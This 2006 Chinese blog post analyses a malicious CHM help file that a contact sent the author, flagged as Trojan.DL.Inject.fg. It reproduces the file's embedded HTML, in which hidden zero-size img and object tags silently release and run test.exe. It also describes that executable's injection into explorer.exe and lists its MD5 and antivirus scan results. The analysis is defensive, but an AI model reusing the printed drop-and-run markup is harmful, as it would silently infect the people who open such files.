Purpleendurer@CSDN

编程……任是无情也动人~

[06-20] 一个释放/运行EXE文件的CHM文件 Trojan.DL.Inject.fg(TrojanDownloader.Small.mp)(第3版)

endurer 原创

2006-06-20 第3版 补充:瑞星18.32.10将test.exe报为Trojan.DL.Inject.fg
2006-06-19 第2版 补充:江民KV将test.exe报为TrojanDownloader.Small.mp
2006-06-18 第1

一位网发来的cHM文件中有代码:

 


 

<body onselectstart="return false"; onpaste="return false";>
<img src="test.exe" width=0 height=0>
<img src="001.jpg">
<object id="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="test.exe">
</object>

 


 

因此打开此CHM文件会释放/运行一个名为test.exe的文件。

test.exe用Microsoft Visual C++ 编写,经UPX压缩,会用线程插入explorer.exe,试图访问:hxxp://gd.vnet.cn


File: test.exe
Status: POSSIBLY INFECTED/MALWARE (Note: this file was only flagged as malware by heuristic detection(s). This might be a false positive. Therefore, results of this scan will not be stored in the database)
MD5 1d0b29b416ebe8e942173a326eb6e1ed
Packers detected: UPX
Scanner results
AntiVir Found Heuristic/Hijacker (probable variant)
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
UNA Found nothing
VirusBuster Found nothing
VBA32 Found nothing

阅读更多
个人分类: 系统安全
上一篇为什么数据加密不能代替综合安全
下一篇Rootkits 和 Windows Vista
想对作者说点什么? 我来说一句

网页自动运行EXE程序资源

2009年05月09日 6KB 下载

没有更多推荐了,返回首页

关闭
关闭